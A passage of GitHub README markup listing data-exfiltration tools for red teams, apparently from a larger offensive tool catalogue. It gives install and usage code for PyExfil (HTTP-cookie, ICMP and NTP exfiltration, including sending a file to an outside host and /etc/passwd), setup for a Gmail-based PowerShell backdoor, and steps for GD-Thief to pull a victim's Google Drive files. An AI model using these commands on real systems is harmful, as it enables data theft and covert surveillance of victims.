0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios.\"\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install\"\u003e\u003cpre\u003egit clone https://www.github.com/ytisf/PyExfil\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PyExfil\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install py2exe\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip setup.py install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Full Usage \u003ca href=\"https://github.com/ytisf/PyExfil/blob/master/USAGE.md\"\u003ehere\u003c/a\u003e)\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eHTTP Cookies\u003c/h4\u003e\u003ca id=\"user-content-http-cookies\" class=\"anchor\" aria-label=\"Permalink: HTTP Cookies\" href=\"#http-cookies\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen\n\n# For Client (exfil)\nsend_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)\n\n# For Server (collecting)\nlisten(local_addr='127.0.0.1', local_port=80)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan class=\"pl-v\"\u003eHTTP_Cookies\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003ehttp_exfiltration\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003esend_file\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003elisten\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003esend_file\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eaddr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e'http://www.morirt.com'\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003efile_path\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eFILE_TO_EXFIL\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003elisten\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003elocal_addr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan 
class=\"pl-s\"\u003e'127.0.0.1'\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003elocal_port\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e80\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eICMP Echo 8\u003c/h4\u003e\u003ca id=\"user-content-icmp-echo-8\" class=\"anchor\" aria-label=\"Permalink: ICMP Echo 8\" href=\"#icmp-echo-8\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener\n\n# For Client (exfil)\nip_addr = \u0026quot;127.0.0.1\u0026quot;\nsend_file(ip_addr, src_ip_addr=\u0026quot;127.0.0.1\u0026quot;, file_path=\u0026quot;\u0026quot;, max_packetsize=512, SLEEP=0.1)\n\n# For Server (collecting)\ninit_listener(ip_addr, saving_location=\u0026quot;/tmp/\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan 
class=\"pl-c1\"\u003eICMP\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003eicmp_exfiltration\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003esend_file\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003einit_listener\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003esend_file\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003esrc_ip_addr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003efile_path\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003emax_packetsize\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e512\u003c/span\u003e, \u003cspan class=\"pl-c1\"\u003eSLEEP\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0.1\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003einit_listener\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003esaving_location\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"/tmp/\"\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eNTP Request\u003c/h4\u003e\u003ca id=\"user-content-ntp-request\" class=\"anchor\" aria-label=\"Permalink: NTP Request\" href=\"#ntp-request\"\u003e\u003csvg 
class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT\n\n# For Client (exfil)\nip_addr = \u0026quot;127.0.0.1\u0026quot;\nexfiltrate(\u0026quot;/etc/passwd\u0026quot;, ip_addr, time_delay=0.1)\n\n# For Server (collecting)\nntp_listener(ip=\u0026quot;0.0.0.0\u0026quot;, port=NTP_UDP_PORT)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003eNTP\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003entp_exfil\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eexfiltrate\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003entp_listen\u003c/span\u003e, \u003cspan class=\"pl-c1\"\u003eNTP_UDP_PORT\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e\n\u003cspan 
class=\"pl-en\"\u003eexfiltrate\u003c/span\u003e(\u003cspan class=\"pl-s\"\u003e\"/etc/passwd\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003etime_delay\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0.1\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003entp_listener\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"0.0.0.0\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003eport\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eNTP_UDP_PORT\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Viralmaniar/Powershell-RAT\"\u003ePowershell RAT\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powershell-rat\" class=\"anchor\" aria-label=\"Permalink: 🔙Powershell RAT\" href=\"#powershell-rat\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 
1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePython based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Viralmaniar/Powershell-RAT\"\u003e\u003cpre\u003egit clone https://github.com/Viralmaniar/Powershell-RAT\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Full Usage \u003ca href=\"https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md\"\u003ehere\u003c/a\u003e)\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eSetup\u003c/h4\u003e\u003ca id=\"user-content-setup\" class=\"anchor\" aria-label=\"Permalink: Setup\" href=\"#setup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 
1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThrowaway Gmail address\u003c/li\u003e\n\u003cli\u003eEnable \"Allow less secure apps\" by going to \u003ca href=\"https://myaccount.google.com/lesssecureapps\" rel=\"nofollow\"\u003ehttps://myaccount.google.com/lesssecureapps\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eModify the \u003ccode\u003e$username\u003c/code\u003e \u0026amp; \u003ccode\u003e$password\u003c/code\u003e variables for your account in the Mail.ps1 Powershell file\u003c/li\u003e\n\u003cli\u003eModify \u003ccode\u003e$msg.From\u003c/code\u003e \u0026amp; \u003ccode\u003e$msg.To.Add\u003c/code\u003e with throwaway gmail address\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/antman1p/GD-Thief\"\u003eGD-Thief\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gd-thief\" class=\"anchor\" aria-label=\"Permalink: 🔙GD-Thief\" href=\"#gd-thief\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 
2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/antman1p/GD-Thief.git\ncd GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\"\u003e\u003cpre\u003egit clone https://github.com/antman1p/GD-Thief.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ethen...\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eCreate a new Google Cloud Platform (GCP) project\u003c/li\u003e\n\u003cli\u003eEnable a Google Workspace API\u003c/li\u003e\n\u003cli\u003eConfigure OAuth Consent screen\u003c/li\u003e\n\u003cli\u003eCreate a credential\u003c/li\u003e\n\u003cli\u003eAdd the victim's Google account to the Application's Test Users\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eFor detailed setup instructions see the \u003ca href=\"https://github.com/antman1p/GD-Thief#how-to\"\u003eHow To 
Guide\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"usage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]}\n\t[-t \u0026lt;THREAD COUNT\u0026gt;]\n\nhelp:\n\nThis Module will connect to Google's API using an access token and exfiltrate files\nfrom a target's Google Drive. It will output exfiltrated files to the ./loot directory\n\narguments:\n -m [{dlAll, dlDict}],\n --mode [{dlAll, dlDict}]\n The mode of file download\n Can be \u0026quot;dlAll\u0026quot;, \u0026quot;dlDict [-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]\u0026quot;, or... (More options to come)\n\noptional arguments:\n -d \u0026lt;DICTIONARY FILE PATH\u0026gt;, --dict \u0026lt;DICTIONARY FILE PATH\u0026gt;\n Path to the dictionary file. Mandatory with download mode\u0026quot;-m, --mode dlDict\u0026quot;\n You can use the provided dictionary, per example: \u0026quot;-d ./dictionaries/secrets-keywords.txt\u0026quot;\n -t \u0026lt;THREAD COUNT\u0026gt;, --threads \u0026lt;THREAD COUNT\u0026gt;\n Number of threads. 
(Too many could exceeed Google's rate limit threshold)\n\n -h, --help\n show this help message and exit\"\u003e\u003cpre\u003eusage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]}\n\t[-t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\n\nhelp:\n\nThis Module will connect to Google\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003es API using an access token and exfiltrate files\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003efrom a target\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003es Google Drive. It will output exfiltrated files to the ./loot directory\n\narguments:\n -m [{dlAll, dlDict}],\n --mode [{dlAll, dlDict}]\n The mode of file download\n Can be \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edlAll\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e, \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edlDict [-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e, or... (More options to come)\n\noptional arguments:\n \u003cspan class=\"pl-k\"\u003e-d\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e, --dict \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n Path to the dictionary file. 
Mandatory with download mode\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e-m, --mode dlDict\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n You can use the provided dictionary, per example: \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e-d ./dictionaries/secrets-keywords.txt\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n \u003cspan class=\"pl-k\"\u003e-t\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e, --threads \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n Number of threads. (Too many could exceeed Google\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003es rate limit threshold)\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e -h, --help\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e show this help message and exit\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice \u003ca href=\"https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e explaining the logic behind the tool.\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eImpact\u003c/h1\u003e\u003ca id=\"user-content-impact\" class=\"anchor\" aria-label=\"Permalink: Impact\" href=\"#impact\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-conti-pentester-guide-leak\" class=\"anchor\" aria-label=\"Permalink: 🔙Conti Pentester Guide Leak\" href=\"#conti-pentester-guide-leak\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eConti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks.\u003c/p\u003e\n\u003cp 